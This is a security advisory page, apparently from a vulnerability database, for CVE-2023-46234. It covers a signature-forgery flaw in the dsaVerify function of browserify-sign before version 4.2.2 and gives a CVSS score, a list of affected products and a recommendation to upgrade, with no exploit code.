PT-2023-9034 · Unknown+5 · Browserify-Sign+5
Roadicing
·
Publicado
2023-10-26
·
Atualizado
2025-06-25
·
CVE-2023-46234
CVSS v2.0
7.8
Alta
| Vetor | AV:N/AC:L/Au:N/C:N/I:C/A:N |
Name of the Vulnerable Software and Affected Versions
browserify-sign versions prior to 4.2.2
Description
The issue is related to an upper bound check problem in the
dsaVerify function, which allows an attacker to construct signatures that can be successfully verified by any public key. This leads to a signature forgery attack. All places in the project that involve DSA verification of user-input signatures are affected by this issue.Recommendations
To resolve the issue, update to version 4.2.2 or later. As a temporary workaround, consider disabling the
dsaVerify function until a patch is available. Restrict access to areas of the project that involve DSA verification of user-input signatures to minimize the risk of exploitation. Avoid using the dsaVerify function in the affected API endpoints until the issue is resolved.Exploit
Correção
Improper Verification of Cryptographic Signature
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Enumeração de Fraquezas
Identificadores relacionados
Produtos afetados
Astra Linux
Confluence
Linuxmint
Red Os
Ubuntu
Browserify-Sign